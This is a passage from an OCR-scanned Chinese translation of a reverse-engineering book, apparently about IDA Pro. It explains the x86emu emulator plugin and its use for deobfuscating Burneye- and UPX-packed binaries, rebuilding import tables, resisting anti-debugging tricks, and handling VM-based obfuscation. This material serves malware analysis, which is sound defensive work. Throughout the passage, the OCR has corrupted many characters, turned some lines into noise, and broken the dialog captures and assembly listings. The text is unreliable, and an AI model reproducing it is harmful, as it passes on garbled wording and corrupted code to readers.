果 。 注 意 ， 模 拟 需 并 没有 必要 从 一 个 程序 的 入 口 点 开始 模拟 。 你 完全 可 以 使 用 模拟 需 模 拟 二 进 制 
文件 中 的 一 个 函数 ， 以 研究 该 困 数 的 行为 。 这 也 是 我 们 提供 Jump to cursor 按钮 的 目的 之 一 。 使 用 
这 个 按钮 ， 你 可 以 轻松 确定 二 进 制 文件 中 的 模拟 目标 。 

Run 按钮 的 功能 与 Run to cursor 按钮 的 功能 类 似 。 但 是 ， 它 更 加 人 危险， 因为 在 到 达 一 个 断 点 
之 前 ， 执 行 不 会 停止 。 因 此 ， 如 果 你 选择 使 用 这 个 命令 ， 你 应 当 完 全 确定 执行 会 到 达 某 个 断 点 。 

Segments 按钮 用 于 访问 x86 段 寄 存 融 和 段 基 址 的 配置 。 段 配置 对 话 框 如 岁 21-5 所 示 ， 你 可 
以 通过 它 修改 与 段 有 关 的 值 。 








CS[oxoo:S | CSbase[oxooooo000 
SS[oxo023 55 base [oxoooo0000 
DS[oxoo23 ^ | DSbase[oxoooooo00 
ES [0x0023 ES base [0x00000000 
FS[oxo0:8 ^ — FS base | 0x7FFDE000 
GS[oxonoo ^ — GSbase[oxooooo000 


图 21-5 x86emu Ez 2f Eos BU ER: 


TATE Sep tr WW FOR REEE, fH, le är B6 EA x86 全 局 
描述 得 表 ( GDT )。 

单 击 Set Memory 按钮 ， 将 显示 如 图 21-6 所 示 的 基本 内 存 修改 对 话 框 。 
Data type 
(* 8bithex {° ASCII w/o null 


(C i6bithex € ASCII w/ null 
£^ 32bithex €" Load from file 
























Start address: 


| üxüü040876C 






Space separated values: 


EN 





图 21-6  x86emu 内 存 修改 对 话 框 


基本 上 ， 这 个 对 话 框 是 一 些 SDK PatchXXX 函数 的 包 涩 带 。 插 入 到 数据 库 中 的 数据 的 类 型 通 
过 对 话 框 提供 的 单 选 按 钮 进行 选择 ， 而 具体 的 数据 则 输入 到 对 话 框 提供 的 编辑 框 中 。 如 果 选 择 
Load from file 按钮 ， 用 户 将 看 到 一 个 标准 的 打开 文件 对 话 杠 ,选择 一 个 文件 后 ,这 个 文件 将 从 指 
定 地 址 开始 把 内 容 传送 到 数据 库 中 。 

Push data 按钮 用 于 将 数据 值 放 入 被 模拟 的 程序 栈 的 项 部 。 生 成 的 对 话 框 如 图 21-7 所 示 ， 你 
可 以 通过 它 指定 将 要 压 入 栈 的 一 个 或 几 个 数据 项 。 
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Enter space separated data 


[oxbfficsao 300 
Cancel | 





图 21-7 x86emu 栈 数据 对 话 框 


模拟 希 当 前 仅 接受 数值 数据 。 提 供 的 值 以 一 次 4 字 市 的 方式 ， 按 从 右 至 左 的 顺序 压 入 栈 中 ， 
就 好 像 它们 是 一 个 也 数 调用 的 参数 。 栈 指针 的 值 将 根据 被 压 入 栈 中 的 值 的 数量 进行 调整 。 这 个 对 
话 框 的 主要 用 途 是 在 直接 跳 转 到 将 要 模拟 的 图 数 之 前 ， 对 因数 的 参数 进行 配置 。 这 样 ， 用 户 不 需 
要 找到 也 数 的 具体 执行 路 径 ， 即 可 模拟 这 个 也 数 。 

3. 模拟 器 辅助 的 去 模糊 

接 下 来 ， 我们 将 讨论 将 x86emu 插件 作为 一 个 去 模糊 工具 。 首 先 回 到 开发 了 一 个 完整 的 IDC 
脚本 的 Burneye 示例 。 假 设 我 们 之 前 并 不 知道 Burneye 解码 算法 ， 去 模糊 过 程 如 下 所 示 。 

(1) 打开 Burneye 保 护 的 二 进 制 文件 ,光标 应 目 动 位 于 start A O RAE GER Ze ALT+F8 ), 
图 21-4 所 示 的 对 话 框 将 显示 模拟 带 的 结 采 状态 。 

(2) 开始 单 步 执行 模拟 顶 ， 请 特别 注意 将 要 模拟 的 指令 。6 EA, RMANA KAT sub_ 
53/1048 处 (参见 代码 清单 21-3 )。 

(3) 这 个 函数 的 结构 似乎 相当 完整 。 我 们 可 以 选择 继续 和 单 步 执行 模拟 副 ， 以 便 更 完整 地 了 解 
该 函数 的 执行 流 。 我 们 也 可 以 选择 对 这 个 函数 进行 一 段 时 间 的 人 研究 , 确定 将 光标 放置 在 该 也 数 的 
return 语句 上 并 单 击 Runto cursor 按 钮 是 否 安 全 ,我 们 选择 后 一 种 情况 ,将 光标 放 在 地 址 0537108h 
处 ， 并 单 击 Run to cursor 按钮 。 

(4) 至 此 去 模糊 已 经 完成 。 单 步 执行 模拟 希 ， 有 再 执行 return 霹 句 两 次 ， 返 回 新 的 去 模糊 后 的 
代码 ,使 IDA 将 去 模糊 后 的 字 市 重新 格式 化 为 指令 。 

得 到 的 去 模糊 代码 如 下 所 示 : 























LOAD:05371082 loc 5371082: ; CODE XREF: start+E 个 j 
LOAD:05371082 call sub_5371048 

LOAD:05371082 ; ----------------- 
LOAD :05371087 db 0 

LOAD:05371088 db 0 

LOAD :05371089 db 0 

LOAD :0537108A db 0 

LOAD:0537108B db 0 

LOAD:0537108C db 0 

LOAD :0537108D db 0 

LOAD:0537108E db 0 

LOAD:0537108F db 0 


LOAD:05371090 ; -------------- 
LOAD: 05371090 
LOAD:05371090 loc 5371090: ; DATA XREF: LOAD:off 5371008 个 o 

€ L0AD:05371090 pushf 
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LOAD :05371091 pop ebx 
LOAD:05371092 mov esi, esp 
LOAD :05371094 call sub_5371117 
LOAD :05371099 mov ebp, edx 
LOAD: 0537109B cmp ecx, 20h 
LOAD:0537109E jl loc 53710AB 
LOAD :053710A4 Xor eax, eax 
LOAD:053710A6 jmp loc 53710B5 





将 这 个 代码 段 与 代码 清单 21-2 比较 ， 很 明显 可 以 看 到 ， 指 令 在 去 模糊 过 程 中 发 生 了 变化 。 
完成 初步 的 去 模糊 后 ， 程 序 从 Toc 5371090 地 址 处 的 pushf 指令 ( 9 ) 继续 执行 。 

很 明显 , 模拟 需 辅 助 的 去 模糊 要 比 前 面 讨 论 的 面 癌 脚本 的 去 模糊 过 程 更 加 简单 。 花 时 间 开 发 
模拟 右 ， 你 得 到 一 个 高 度 灵活 的 去 模糊 方法 ， 而 花 时 间 编 写 一 个 特定 于 Burneye 的 脚本 ， 你 得 到 
一 个 非常 专 一 化 的 脚本 ， 在 其 他 去 模糊 情形 中 ， 这 个 脚本 没有 多 大 用 人 处 。 

注意 ， 虽 然 在 前 一 个 例子 中 ，Burneye 保护 的 二 进 制 文件 是 一 个 Linux ELF 二 进 制 文件 , 但 
是 ，x86emu 仍然 能 够 模拟 这 个 文件 中 的 指令 ， 因 为 它们 全 都 是 x86 指令 ， 而 不 论 它 们 来 自 什么 
操作 系统 ， 属 于 何 种 文件 类 型 。x86emu 可 直接 用 于 Windows PE 二 进 制 文件 ， 如 本 章 前 面 讨 论 的 
UPX 示 例 。 目 前 绝 大 多 数 的 模糊 恶意 软件 都 以 Windows 平台 为 攻击 对 象 , 因此 ，x86emnu 提供 了 
许多 特定 于 Windows PE 二 进 制 文件 的 功能 〈 如 前 所 述 )。 

使 用 模拟 需 解 压 UPX 二 进 制 文件 非常 答 单 。 首 先 ， 在 局 动 模拟 需 时 ， 交 标 应 放置 在 程序 的 
和 人口 点 (start )。 然 后 ,再 将 光标 移 到 UPX 导入 表 的 第 一 条 指令 上 , 并 重建 循环 (代码 清单 21-1 
的 地 址 0040886Ch 处 ), 使 模拟 器 能 够 运行 Run to Cursor 命令 。 这 时 , 二 进 制 文件 已 经 被 解压 ,“ 字 
符 串 ”窗口 可 用 于 查看 所 有 人 解压 后 的 库 和 吗 数 的 名 称 ，UPX 将 用 它们 构建 程序 的 导入 表 。 如 果 
檬 拟 磊 偿 步 模拟 代码 清单 21-1 中 的 代码 ， 最 终 它 将 过 到 下 面 的 也 数 调用 : 






































UPX1:00408882 call dword ptr [esi+808Ch 


模拟 这 类 指令 可 能 非常 危险 ， 因 为 一 开始 ， 你 并 不 清楚 这 个 指令 指 癌 什么 地 方 ( 表示 call 
指令 的 目标 地 址 并 不 明显 )。 一 般 而 言 ， 函 数 调用 可 能 指 癌 两 个 地 方 : 程序 代码 (text) 段 内 的 
一 个 函数 ,或 者 程序 所 使 用 的 共享 库 中 的 一 个 函数 。 任 何 时 候 遇 到 call 指令 ， Tila RE H 
标 地 址 是 否 位 于 被 分 析 的 文件 的 虚拟 地 址 空间 之 内 , 或 者 目标 地 址 是 否 与 所 分 析 二 进 制 文件 已 加 
载 的 一 个 库 导 出 的 图 数 有 关 。 如 前 所 述 , 模拟 天 会 加 载 它 所 分 析 的 二 进 制 文件 加 载 的 所 有 库 的 导 
出 目录 。 如 果 模 拟 冀 确定 调用 指令 的 目标 地 址 在 该 二 进 制 文件 的 边界 以 外 ,模拟 带 将 扫描 加 载 到 
数据 库 中 的 导出 表 ， 以 确定 被 调用 的 库 函 数 。 对 于 Windows PE 文件 ,模拟 需 为 表 21-2 中 列 出 的 
国 数 提供 了 模拟 实现 。 

如 果 模 拟 带 确定 其 中 的 一 个 函数 被 调用 , 它 将 从 程序 栈 中 读 取 任何 参数 ,要 么 执行 和 该 果 数 
相同 的 操作 ( 如 果 程 序 正在 运行 )， 或 者 执行 某 个 最 低 限 度 的 操作 ， 生 成 一 个 在 被 模拟 的 程序 看 
来 是 正确 的 返回 地 址 。 对 于 使 用 stdcall 调用 约定 的 哺 数 ， 在 完成 被 模拟 的 函数 之 前 ， 模拟 带 还 
会 市 除 任何 栈 参数 。 
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表 21-2 ”被 x86emu 模 拟 的 函数 


CheckRemoteDebuggerPresent GetTickCount LocalFree VirtualAlloc 
CreateIhread GetVersion NtQuerySystemInformation VirtualFree 
GetCurrentThreadId HeapAlloc NtQueryInformationProcess calloc 
GetCurrentProcess HeapCreate NtSet InformationIhread free 

Get CurrentProcess Id HeapDestroy RCIAl locateHeap |strcat 
GetModuleHandleA HeapFree TIsAl Toc |strcpy 
GetProcAddress IsDebuggerPresent TlsFree Istrien 
GetProcessHeap LoadLibraryA TlsGetValue malloc 

Get IhreadContext LocalAlloc TlsSetValue realloc 


模拟 与 推 有 关 的 图 数 的 行为 , 将 会 使 模拟 需 操 纵 它 的 内 部 堆 实 现 〈 由 .heap 市 实现 ), 并 返回 
一 个 适用 于 被 模拟 函数 的 值 。 例 如 ，HeapAlloc 的 模拟 版 本 返回 的 值 是 一 个 适合 被 模拟 的 程序 写 
入 数据 的 地 址 。 调 用 VirtualAlloc 的 模拟 版 本 时 ， 将 在 数据 库 中 创建 一 个 新 节 ， 用 于 表示 新 映射 
的 虚拟 地 址 空间 。IsDebuggerPresent 的 模拟 版 本 总 是 返回 假 。 在 模拟 LoadLibraryA 时 ,模拟 大 会 
通过 检查 回 LoadLibraryA 提供 的 栈 参 数 ， 提 取出 它 所 加 载 的 库 的 名 称 。 然 后 ， 模 拟 需 尝试 在 本 
地 系统 上 打开 这 个 库 , 使 这 个 库 的 导出 表 能 够 加 载 到 数据 库 中 。 最 后 , 模拟 融会 向 调用 方 返 回 一 
个 合适 的 库 句 柄 ?" 值 。 当 拦截 到 对 GetProcAddress 的 调用 时 ， 模 拟 器 会 检查 栈 上 的 参数 ， 确 定 被 
引用 的 共享 库 。 然 后 ， 模 拟 融 解 析 这 个 库 的 导出 表 ,， 计 算出 GetProcAddress 的 正确 内 存 地 址 。 最 
后 ,模拟 版 本 的 GetProcAddress 函数 将 函数 地 址 返回 给 调用 方 , 对 LoadLibraryA 和 GetProcAddress 
的 调用 将 在 IDA 的 “输出 ”窗口 中 显示 。 

调用 x86emu 不 为 其 提供 内 部 模拟 的 晒 数 时 ， 将 显示 与 图 21-8 类 似 的 对 话 框 。 

















À Call to: CreateFileA 31 xl 
Arguments 





: OxOO41dCOO 
arg 1: Ox80000CO00 [DWORD dwDesiredAccess] 
arg 2: OxO0O0000COl1 [DWORD dwShareMode] 
arg 3: Ox00000C00  [LPSECURITY ATTRIBUTES lpSecurityAttributes] 
arg 4: OxOO0000CO3 [DWORD dwCreationDisposition] 
arg 5: OxO00000C80 [DWORD dwFlagsAndAttributes] 
arg 6- OxO0OO000COO0 [HANDLE hTemplateFile] 


Return type: HANDLE 


Return value (eax) Joxo0000000 | —Calling convention 
- C cded 
Numberofags J7aroments 2 


= (* stdcall 


Law | 





图 21-8 x86emu JÆ KAOTAME 
知道 了 被 调用 函数 的 名 称 ， 模 拟 器 将 查询 DA 的 类 型 库 信 息 ， 获 取 该 函数 所 需 的 参数 的 数 
量 和 类 型 。 然 后 ,模拟 需 深 入 挖掘 程序 栈 ， 显 示 已 经 传递 给 该 国 数 的 所 有 参数 及 其 类 型 和 正式 名 
称 。 人 参数 类 型 和 名 称 只 有 在 IDA. 提供 相关 的 类 型 信息 时 才能 正确 显示 。 用 户 可 利用 这 个 对 话 框 























(D 一 个 Windows 库 句 柄 仅 识 别 Windows 进程 中 的 一 个 库 。 库 句柄 实际 上 是 一 个 基 址 , 库 在 这 个 位 置 被 加 载 到 内 存 中 。 
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指定 一 个 返回 值 ， 以 及 该 函数 使 用 的 调用 约定 (这些 信息 可 能 由 IDA 提供 )。 如果 选择 stdcal 
调用 约定 ， 用 户 应 指出 ， 在 调用 完成 时 ， 应 从 栈 上 删除 多 少 个 参数 ( 而 非 学 市 ) Zeg che 
用 时 ,模拟 带 需 要 这 些 信 息 来 维持 执行 栈 的 完整 性 。 

回 到 前 面 的 UPX 去 模糊 示例 ， 让 模拟 带 完 成 导入 表 重 建 循环 ， 我 们 发 现 ， 模 拟 各 在 IDA 的 
“输出 ”窗口 中 生成 以 下 输出 : 

x86emu: LoadLibrary called: KERNEL32.DLL (7C800000) 

x86emu: GetProcAddress called: ExitProcess (0x7C81CDDA) 

x86emu: GetProcAddress called: ExitThread (0x7C80C058) 

x86emu: GetProcAddress called: GetCurrentProcess (0x7C80DDF5) 

x86emu: GetProcAddress called: GetCurrentThread (0x7C8098EB) 

x86emu: GetProcAddress called: GetFileSize (0x7C810A77) 


x86emu: GetProcAddress called: GetModuleHandleA (0x7C80B6A1) 
x86emu: GetProcAddress called: CloseHandle (0x7C809B47) 


这 个 输出 记录 了 模糊 二 进 制 文 件 加 载 的 库 ， 以 及 这 些 库 中 被 模糊 程序 查找 的 函数 "。 如 果 以 
这 种 方式 查找 函数 地 址 ， 这 些 地 址 通 沼 保存 在 一 个 数组 中 ( 这 个 数组 是 程序 的 导入 表 )， 以 方便 
随后 使 用 。 

去 檬 糊 后 的 程序 存在 一 个 基本 问题 ,， 即 它们 缺乏 符号 表 信 息 ， 而 没有 经 过 模糊 处 理 的 二 进 制 
文件 往往 包含 这 些 信息 。 如 来 一 个 二 进 制 文件 的 导入 表 完 好 无 损 ，IDA 的 PE 加 载 带 将 根据 它 在 
运行 时 将 包含 其 地 址 的 函数 的 名 称 , 为 导入 表 中 的 每 个 条 目 命名 。 如 末 遇 到 一 个 模糊 二 进 制 文件 ， 
对 每 一 个 存储 函数 地 址 的 位 置 应 用 函数 名 称 将 会 有 好 处 。 束 UPX 而 言 ， 下 面 摘 目 代码 请 单 21-1 
的 几 行 代码 说 明了 函数 地 址 在 每 次 经 历 孔 数 查 找 循环 时 如 何 保存 到 内 存 中 : 

















UPX1:00408897 call dword ptr [esi+8090h| ; GetProcAddress 
UPX1:0040889D Or eax, eax 
UPX1:0040889F jz short loc 4088A8 

@ UPX1:004088A1 mov [ebx], eax ; Save to import table 
UPX1:004088A3 add ebx, 4 


地 址 004088A1h 处 的 指令 ( @ ) 负责 将 函数 地 址 存储 到 重建 后 的 导入 表 中 。x86emnu 提供 一 种 
自动 工具 ， 只 要 x86emu 识别 一 个 这 样 的 指令 ， 该 工具 将 命名 导 人 表 中 的 每 个 条 目 。 模 拟 需 称 这 
样 的 指令 为 “导入 地 址 保存 点 ”( import address save point )， 你 可 以 使 用 Emulate > Windows » Set 
Import Address Save Point ( 模拟 > 窗口， 设置 导入 地 址 保存 点 ) 亲 单 将 一 个 地 址 指定 为 “导入 地 
址 保存 点 ”。 为 了 使 这 一 功能 生效 ， 你 必须 在 模拟 指令 之 前 进行 指定 。 完 成 指定 后 ， 每 次 模拟 这 
条 指令 ,模拟 带 将 进行 一 次 查找 , 确定 被 写 入 的 数据 代表 哪 一 个 函数 ,然后 使 用 这 个 导入 哺 数 的 
名 称 命名 被 写 入 的 地 址 。 在 UPX 示例 中 ， 奎 没 有 指定 一 个 “导入 地 址 保存 点 ”， 将 得 到 下 面 的 导 
AR (部 分 显示 ): 























D 只 要 程序 已 经 使 用 GetProcAddress 找到 某 个 函数 的 地 址 ， 随 后 ， 该 程序 可 以 使 用 返回 的 地 址 随时 调用 这 个 函数 。 
以 这 种 方式 查找 函数 地 址 ， 既 免 去 了 在 构建 时 显 式 链接 函数 的 需要 ， 也 减少 了 dumpbin 等 静态 分 析 工 具 能 够 提取 
到 的 信息 量 。 
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UPX0:00406270 dd 7C81CDDAh 
UPXO : 00406274 dd 7C80C058h 
UPX0:00406278 dd 7C80DDF5h 
UPX0:0040627C dd 7C8098EBh 





但 是 ， 在 指定 “导入 地 址 保存 点 ”时 ，x86emnu 工具 执行 的 自动 命名 将 产生 以 下 自动 生成 的 
导入 表 《〈 部 分 显示 小 


UPX0:00406270 ; void  stdcall ExitProcess(UINT uExitCode) 


UPX0:00406270 ExitProcess dd 7C81CDDAh ; DATA XREF: j ExitProcess/^^r 
UPXO:00406274 ; void  stdcall ExitThread(DWORD dwExitCode) 

UPX0:00406274 ExitThread dd 7C80C058h ; DATA XREF: j ExitThread'r 
UPX0:00406278 ; HANDLE stdcall GetCurrentProcess() 

UPX0:00406278 GetCurrentProcess dd 7C80DDF5h ; DATA XREF: j GetCurrentProcess/^r 
UPX0:0040627C ; HANDLE stdcall GetCurrentThread() 

UPX0:0040627C GetCurrentThread dd 7C8098EBh ; DATA XREF: j GetCurrentThread/hr 








以 这 种 方式 重建 导入 表 , IDA 将 能 够 使 用 从 它 的 类 型 库 中 提取 出 的 参数 类 型 信息 , 7 PE KR 
调用 添加 适当 的 注释 ， 反 汇编 代码 清单 的 总 体质 量 也 因此 得 到 显著 提高 。 
4. x86emu 的 其 他 功能 
这 种 模拟 融 还 提供 其 他 一 些 有 用 的 功能 。 下 面 详细 介绍 其 中 一 些 功能 。 
O File » Dump ( 文件》 转 储 ), 用 户 可 利用 这 个 集 单 选项 指定 一 个 数据 库 地 址 范围 ， 这 些 地 
址 将 转 储 到 一 个 文件 中 。 软 认 情 况 下 ， 这 个 范围 由 光标 当前 所 在 位 置 延伸 到 数据 库 中 的 





























最 大 虚拟 地 址 。 
O File » Dump Embedded PE( XPF » PRERA IR PE ), 许 多 恶意 程序 包含 舱 入 式 可 执行 文件 ， 








以 将 它们 安 站 到 目标 系统 中 。 这 个 亲 单 选项 在 光标 当前 所 在 位 置 寻 找 一 个 有 效 的 PE 文件 ， 
解析 这 个 文件 的 头 部 ， 以 确定 该 文件 的 大 小 ， 然 后 从 数据 库 中 提取 出 相应 的 字 节 ， 转 储 
i[—^ CF HG 
O View » Enumerate Heap (查看 p ISHE ), ix ie ROUES E 2H C. 27 BORED fi 
到 “输出 ”窗口 中 ， 如 下 所 示 : 
x86emu: Heap Status --- 
0x5378000-0x53781ff (0x200 bytes) 


0x5378204-0x5378217 (0x14 bytes) 
0x537821c-0x5378347 (0x12c bytes) 








O Emulate > Switch Thread ( 模拟， 切换 线程 )。 在 Windows PE 文件 中 进行 模拟 时 ，x86emu 
会 捕捉 对 CreateThread 阴 数 的 调用 ， 并 分 配额 外 的 资源 来 管理 一 个 新 的 线程 。 由 于 模拟 
器 没有 上 自己 的 调度 禹 ， 如 果 你 希望 在 多 个 线程 之 间 切 换 ， 必 须 使 用 这 个 沫 单项 。 

O Functions » Allocate Heap Block ( 基数， 分 配 堆 块 )。 用 户 可 利用 这 个 菜单 项 在 模拟 堆 中 保 
留 一 个 内 存 块 。 用 户 需 要 提供 这 个 块 的 大 小 。 这 个 新 保留 块 的 地 址 将 报告 给 用 户 。 如 果 
在 模拟 过 程 中 需要 暂 存 空间 ， 就 会 用 到 这 项 功能 。 
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O Functions » Allocate Stack Block ( 隐 数 》 分 配 栈 块 )。 用 户 可 利用 这 个 沫 单项 在 模拟 栈 中 

保留 一 个 内 存 块 。 它 的 作用 与 Functions » Allocate Heap Block 命令 类 似 。 

5. x86emu 与 反 调 试 

虽然 模拟 如 并 不 是 作为 调试 右 使 用 的 , 但 它 必 须 为 被 模拟 的 程序 模拟 一 个 运行 时 环境 。 为 了 
成 功 模拟 许多 模糊 二 进 制 文件 , 模拟 硕 不 能 成 为 各 种 主动 的 反 调 试 技 蕊 的 牺牲 品 。 在 设计 模拟 天 
的 一 些 功能 时 ， 我 们 一 直 考 虑 到 这 些 反 调试 技巧 。 

其 中 一 种 反 调 试 技巧 是 使 用 x86 rdtsc 指令 测量 时 间 间 隔 , 确保 一 个 程序 不 会 被 调试 磊 暂 停 。 
rdtsc 指令 用 于 该 取 内 部 时 间 惟 计数 器 (Time Stamp Counter, TSC )， 并 返回 一 个 64 ME, RR 
处 理 需 目 上 一 次 重启 以 来 所 经 过 的 时 间 。TSC 递增 的 速度 因 CPU 类 型 而 异 ， 但 基本 上 是 每 个 内 
部 CPU 时 钟 周 期 递增 一 次 。 调 试 硕 无 法 终止 TSC 递增 ， 因 此 ， 通 过 测量 两 个 连续 的 rdtsc 调用 
之 间 的 TSC 差异 ， 处 理 需 能 够 确定 它 曾 经 被 终止 很 长 一 段 时 间 。x86emnu 维护 有 一 个 内 部 TSC, 
它 随 每 条 被 模拟 的 指令 而 递增 。 因 为 模拟 TSC 仅仅 受 被 模拟 的 指令 影响 , 因此 , 使 用 rdtsc 的 间 
际 不 论 有 多 久 ， 都 不 会 造成 问题 。 这 样 ， 观 察 到 的 TSC 值 之 间 的 差距 将 始终 与 在 两 次 调用 rdtsc 
之 间 模 拟 的 指令 数量 大 致 成 一 定 比例 , 而 且 这 个 差距 会 始终 保持 足够 小 , 能 够 让 被 模拟 的 程序 确 
信 它 没有 附加 调试 从 。 

有 意 使 用 异 帝 是 模拟 融 必 须 处 理 的 另 一 种 反 调 试 技巧 。 模 拟 硕 包含 非常 基本 的 功能 ,能 够 模 
拟 Windows 结构 化 异常 处 理 ( SEH ) 进程 的 行为 。 如 果 被 模拟 的 程序 是 一 个 Windows PE 二 进 制 
文件 , 模拟 需 必 须 通过 构建 一 个 SHE CONTEXT 结构 体 , 通过 fs:[0] 遍 历 异 常 处 理 程序 列表 来 定位 
当前 的 异 稼 处 理 程 序 , 并 将 控制 权 转 交 给 这 个 已 安装 的 异常 处 理 程序 ， 以 此 来 啊 应 一 个 异 篆 或 软 
件 中 断 。 当 该 异常 处 理 程序 返回 时 , 模拟 融 将 从 CONTEXT 结构 体 ( 可 能 已 经 被 异常 处 理 程序 修改 ) 
恢复 CPU 的 状态 。 

最 后 ， 虽 然 x86emu 模拟 x86 便 件 调试 寄存 带 的 行为 ， 但 它 并 不 利用 这 些 寄存 带 在 一 个 被 模 
拟 的 程序 中 设置 断 点 。 如 前 所 述 ， 模 拟 器 在 内 部 维护 用 户 指 定 的 断 点 列表 ， 并 在 执行 每 条 指令 前 
扫描 这 个 列表 。 在 Windows 异常 处 理 程序 中 对 调试 寄存 如 的 任何 修改 都 不 会 影响 模拟 各 的 操作 。 


21.4 基于 虚拟 机 的 模糊 


如 本 章 前 面 所 述 ( 见 21.1.2 市 中 的 “操作 人 码 模糊 ”), 一 些 最 复 森 的 模糊 剖 使 用 上 自 定 义 字 广 人 码 
及 相关 的 虚拟 机 重新 实现 了 原本 具有 输入 接收 功能 的 程序 。 面 对 以 这 种 方式 模糊 的 二 进 制 文件 ， 
你 看 到 的 唯一 本 机 代码 为 虚拟 机 。 假设 你 认识 到 所 看 到 的 是 软件 虚拟 机 ， 那么 一 般 而 言 ， 完全 了 
解 所 有 这 些 代 码 并 不 能 揭示 该 模糊 程序 的 真实 意图。 这 是 因为 程序 的 行为 仍然 隐藏 在 必须 由 虚拟 
机 解释 的 舱 入 式 字 市 码 中 。 要 完全 了 解 这 个 程序 ， 首 和 完 你 必须 定位 所 有 的 舱 入 式 字 市 码 ,， 然后 逆 
加 工程 虚拟 机 的 指令 集 ， 以 便 能 够 正确 解释 该 字 节 人 码 的 含义 。 

作为 比较 ， 想 象 一 下 ， 如 果 你 对 Java 一 无 所 知 ， 有 人 给 你 一 个 Java 虚拟 机 和 一 个 包含 已 编 
译 字 市 码 的 .class 文件 ， 并 问 你 它们 有 什么 作用 。 由 于 缺乏 任何 文档 资料 ， 你 可 能 对 字 贡 码 文件 
知之 其 少 ， 并 且 你 需要 完全 逆 癌 工程 虚拟 机 才能 了 解 .class 文件 的 结构 以 及 如 何 解释 它 的 内 容 。 
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对 字 节 人 码 机 怖 声言 有 一 定 了 解 后 ， 接 下 来 你 束 可 以 了 解 .class 文件 的 作用 。 

VMProtect 是 一 球 利 用 非常 复杂 的 基于 虚拟 机 的 模糊 技术 的 商业 产品 。 更 多 是 作为 一 种 学 术 
活动 ，TheHyper 的 HyperUnpackMe2 挑战 二 进 制 文件 是 在 模糊 中 使 用 虚拟 机 的 一 个 相当 简单 的 
示例 ， 主 要 的 挑战 在 于 定位 虚拟 机 的 骨 入 式 字 市 码 程 序 并 确定 每 个 学 市 公 的 含义 。 在 OpenRCE 
上 描述 HyperUnpackMe2 的 文章 ?中 ，Rolf Rolles 采用 的 方法 是 : 充分 了 解 虚拟 机 以 构建 一 个 能 
够 反 汇 编 其 字 节 人 码 的 处 理 带 模块 。 然 后 , 他 使 用 该 处 理 右 模块 来 反 汇 编组 入 到 所 挑战 的 二 进 制 文 
件 中 的 字 广 码 。 使 用 这 个 方法 存在 一 个 小 限制 ,通过 它 你 可 以 查看 HyperUnpackme2 中 的 x86 代 
码 (使 用 IDA 的 x86 模块 ) 或 虚拟 机 代码 (使 用 Rolle 的 处 理 带 模块 )， 但 不 能 同时 查看 这 两 种 
代码 。 为 此 ， 你 需要 创建 两 个 不 同 的 数据 库 ( 每 个 数据 库 使 用 不 同 的 处 理 咒 模块 )。 男 一 种 方法 
是 在 使 用 插件 的 过 程 中 利用 定制 现 有 处 理 需 模块 的 功能 (人 参见 19.5 市 ), 来 有 效 扩展 指令 集 , 在 其 
中 包括 通信 式 虚 拟 机 的 所 有 指令 。 将 这 种 方法 应 用 于 HyperUnpackMe2, ， 我 们 就 可 以 在 一 个 数据 库 
中 同时 查看 x86 代码 和 虚拟 机 代码 了 ， 如 下 面 的 清单 所 示 : 


























TheHyper:01013B2F Oh pop.1 R9 
TheHyper:01013B32 _pop.1 R7 
TheHyper:01013B35 h pop.1 R5 
TheHyper:01013B38 h mov. SP, R2 
TheHyper:01013B3C h sub.1 SP, oCh 
TheHyper:01013B44 h pop.1 R2 
TheHyper:01013B47 h pop.1 R1 
TheHyper:01013BA4A h retn oCh 
TheHyper:01013B4A sub_1013919 endp 
TheHyper:01013BA4A 
TheHyper:01013B4A ; ------------ 
TheHyper:01013B4D dd 24242424h 
TheHyper:01013B51 dd 0A9A4285Dh ; TAG VALUE 
TheHyper:01013B55 
TheHyper:01013B55 ; ============ S U B R O U T IN E ========================= 
TheHyper:01013B55 
TheHyper:01013B55 ; Attributes: bp-based frame 
TheHyper:01013B55 
TheHyper:01013B55 sub 1013B55 proc near ; DATA XREF: TheHyper:0103AF7A?o 
TheHyper:01013B55 
TheHyper:01013B55 var 8 - dword ptr -8 
TheHyper:01013B55 var 4 - dword ptr -4 
TheHyper:01013B55 arg O - dword ptr 8 
TheHyper:01013B55 arg 4 = dword ptr oCh 
TheHyper:01013B55 
TheHyper:01013B55 O push ebp 
TheHyper:01013B56 mov ebp, esp 
TheHyper:01013B58 sub esp, 8 
(D HyperUnpackMe2 是 一 个 crackme。 译 者 注 


(2) 参见 http:/www.openrce.org/articles/full view/28 网 站 的 “Defeating HyperUnpackMe2 With an IDA Processor Module" ; 
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TheHyper:01013B5B mov eax, [ebp«arg ol 
TheHyper:01013B5E mov [esp+8+var 8], eax 
TheHyper:01013B61 mov [esp+8+var 4], O 
TheHyper:01013B69 push 4 
TheHyper:01013B6B push 1000h 


其 中 ， 从 @ 处 开始 的 代码 被 反 汇 编 成 HyperUnpackMe2 "ei. reit VUES BRI E x86 
代码 显示 。 

Hex-Rays 预料 到 了 同步 显示 本 机 代码 和 字 节 人 码 的 功能 , 并 在 IDA 5.7 中 引入 了 目 定 义 数 据 类 
型 和 格式 。 如 有 果 IDA 的 内 置 格式 化 选项 无 法 满足 你 的 需求 ， 这 时 就 可 以 使 用 自 定 义 数据 格式 。 
为 格式 指定 (使 用 脚本 或 插件 ) 一 个 菜单 名 ， 并 指定 一 个 执行 格式 化 的 函数 ， 就 可 以 注册 新 的 格 
式 化 功能 。 为 某 个 数据 项 选择 日 定义 格式 后 , 每 次 需要 显示 该 数据 项 , IDA 虱 会 调用 格式 化 函数 。 
JR IDA 的 内 置 数 据 类 型 并 不 足以 表示 你 在 特定 二 进 制 文件 中 过 到 的 数据 ， 这 时 就 需要 用 到 日 
定义 数据 类 型 。 与 自 定 义 格式 一 样 ， 自 定义 数据 类 型 也 使 用 脚本 或 插件 进行 注册 。Hex-Rays 75 
例 注 册 了 一 个 自 定 义 数据 类 型 来 指派 虚拟 机 字 市 码 , 并 通过 使 用 一 种 自 定 义 数据 格式 将 每 个 字 市 
码 显示 为 一 条 指令 。 这 种 方法 的 缺点 在 于 ， 它 需要 你 定位 每 条 虚拟 机 指令 , 并 明确 更 改 其 数据 类 
型 .使 用 自 定 义 处 理 需 扩展 ,将 单个 值 自 动 指派 为 虚拟 机 指令 可 发 现 每 条 可 到 达 的 指令 ,因为 IDA 
会 推动 反 汇 编 进 程 ， 且 处 理 需 扩展 会 通过 它 的 custom emu 实现 来 发 现 可 到 达 的 新 指令 。 


























21.5 小结 


当前 , 恶意 软件 大 多 是 模糊 程序 。 因此, 如 果 你 希望 研究 一 个 恶意 软件 样本 的 内 部 运行 机 制 ， 
